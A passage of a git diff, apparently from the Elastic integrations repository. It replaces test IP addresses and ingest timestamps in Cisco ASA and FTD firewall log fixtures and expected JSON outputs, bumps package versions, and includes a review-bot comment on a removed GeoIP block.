"domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, 
@@ -4622,14 +4622,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565991Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:34:16.395398600Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4646,8 +4646,8 @@ "asa": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4660,8 +4660,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4701,13 +4701,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565995Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:34:16.395403900Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4724,7 +4724,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4739,8 +4739,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4780,13 +4780,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565999100Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:34:16.395409300Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4804,7 +4804,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4818,8 +4818,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4844,13 +4844,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.566002600Z", - "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:34:16.395414600Z", + "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", 
@@ -4872,8 +4872,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4900,13 +4900,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.566007700Z", - "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:34:16.395419700Z", + "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4928,8 +4928,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -4962,13 +4962,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.566013400Z", - "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:34:16.395424200Z", + "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", 
@@ -4994,26 +4994,32 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "RU-MOW",
- "city_name": "Moscow",
- "country_iso_code": "RU",
- "country_name": "Russia",
- "region_name": "Moscow",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 37.6172,
- "lat": 55.7527
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
- "address": "1.2.3.4",
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
+ "address": "81.2.69.144",
 "port": 80,
 "user": {
 "name": "username"
 },
- "ip": "1.2.3.4"
+ "ip": "81.2.69.144"
 },
 "source": {
 "nat": {
- "ip": "1.2.3.4"
+ "ip": "81.2.69.144"
 },
 "address": "10.2.3.4",
 "port": 49926,
@@ -5052,13 +5058,13 @@
 ],
 "ip": [
 "10.2.3.4",
- "1.2.3.4"
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:38.566019900Z",
- "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)",
+ "ingested": "2021-12-09T13:34:16.395429600Z",
+ "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5073,8 +5079,8 @@
 "asa": {
 "destination_interface": "vlan-42",
 "mapped_source_port": 49926,
- "mapped_destination_ip": "1.2.3.4",
- "mapped_source_ip": "1.2.3.4",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "27215708",
 "source_interface": "internet",
 "mapped_destination_port": 80,
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log
index aaed86dc2e6..71da467bcd5 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log
@@ -1,4 +1,4 @@
 Oct 20 2019 15:42:54: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf53204:10.13.170.13/5060 to ACI-App_VRF:172.16.90.3 from OPTIONS message
 Jun 08 2020 12:59:57: %ASA-6-607001: Pre-allocate SIP SIGNALLING UDP secondary channel for vrf53204:10.18.133.23/5060 to ACI-App_VRF:172.16.74.3 from OPTIONS message
 Aug 6 2020 11:01:37: %ASA-6-607001: Pre-allocate SIP NOTIFY UDP secondary channel for vrf52304:10.18.170.54/5060 to ACI-App_VRF:172.16.72.5 from 200 message
-Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:172.15.72.3 from REGISTER message
+Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:67.43.156.12 from REGISTER message
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json
index d2189658289..68ceea4834c 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json
@@ -47,7 +47,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:47.622586Z",
+ "ingested": "2021-12-09T13:34:24.465484300Z",
 "original": "Oct 20 2019 15:42:54: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf53204:10.13.170.13/5060 to ACI-App_VRF:172.16.90.3 from OPTIONS message",
 "code": "607001",
 "kind": "event",
@@ -115,7 +115,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:47.622597Z",
+ "ingested": "2021-12-09T13:34:24.465492800Z",
 "original": "Jun 08 2020 12:59:57: %ASA-6-607001: Pre-allocate SIP SIGNALLING UDP secondary channel for vrf53204:10.18.133.23/5060 to ACI-App_VRF:172.16.74.3 from OPTIONS message",
 "code": "607001",
 "kind": "event",
@@ -183,7 +183,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:47.622604500Z",
+ "ingested": "2021-12-09T13:34:24.465498400Z",
 "original": "Aug 6 2020 11:01:37: %ASA-6-607001: Pre-allocate SIP NOTIFY UDP secondary channel for vrf52304:10.18.170.54/5060 to ACI-App_VRF:172.16.72.5 from 200 message",
 "code": "607001",
 "kind": "event",
@@ -214,26 +214,8 @@
 "ip": "10.13.133.64"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
- "location": {
- "lon": -118.2946,
- "lat": 34.1004
- }
- },
- "as": {
- "number": 7018,
- "organization": {
- "name": "AT\u0026T Services, Inc."
- }
- },
- "address": "172.15.72.3",
- "ip": "172.15.72.3"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "tags": [
 "preserve_original_event"
@@ -263,14 +245,14 @@
 },
 "related": {
 "ip": [
- "172.15.72.3",
+ "67.43.156.12",
 "10.13.133.64"
 ]
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:47.622611500Z",
- "original": "Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:172.15.72.3 from REGISTER message",
+ "ingested": "2021-12-09T13:34:24.465503900Z",
+ "original": "Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:67.43.156.12 from REGISTER message",
 "code": "607001",
 "kind": "event",
 "action": "firewall-rule",
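Review bot: The `@@ -214,26 +214,8 @@` hunk removes the whole `source.geo` and `source.as` block for the REGISTER record instead of updating it, so the new expected output for `67.43.156.12` no longer asserts anything about GeoIP/ASN enrichment on `source.ip` — the only record in this file that did — whereas the same substitution in the ASA fixture's `@@ -4994` hunk gains a full `geo`/`as` block for `81.2.69.144`. If the bundled test database simply has no entry for `67.43.156.12` that is expected, but it is worth confirming rather than assuming, since the matching input change is the last line of test-sip.log in the previous hunk and choosing an address the test database does resolve (as `81.2.69.144` evidently does) would preserve that coverage. The JSON object these lines belong to starts before and ends after the hunk.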
diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml
index 173a90c4c16..efaab5d515e 100644
--- a/packages/cisco_asa/manifest.yml
+++ b/packages/cisco_asa/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_asa
 title: Cisco ASA
-version: 1.3.0
+version: 1.3.1
 license: basic
 description: Collect logs from Cisco ASA with Elastic Agent.
 type: integration
diff --git a/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log b/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log
index ad5d5f9ee28..c7b2a67bc4e 100644
--- a/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log
+++ b/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log
@@ -1 +1 @@
-2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip
+2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip
diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml
index b554b95416c..08468950ca6 100644
--- a/packages/cisco_ftd/changelog.yml
+++ b/packages/cisco_ftd/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.2.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
index 61405e96a15..d6d4c3719df 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
@@ -57,7 +57,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-09-07T12:21:32.148637500Z",
+ "ingested": "2021-12-09T13:34:27.491792100Z",
 "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)",
 "code": "302016",
 "kind": "event",
@@ -134,7 +134,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.148665100Z",
+ "ingested": "2021-12-09T13:34:27.491797700Z",
 "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -203,7 +203,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.148702200Z",
+ "ingested": "2021-12-09T13:34:27.491802700Z",
 "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -279,7 +279,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.148710300Z",
+ "ingested": "2021-12-09T13:34:27.491808700Z",
 "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -340,7 +340,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-07T12:21:32.148716500Z",
+ "ingested": "2021-12-09T13:34:27.491831500Z",
 "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123",
 "code": "106017",
 "kind": "event",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log
index 9f0a0b8b598..5d21ffa5a9f 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log
@@ -1,268 +1,268 @@
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)
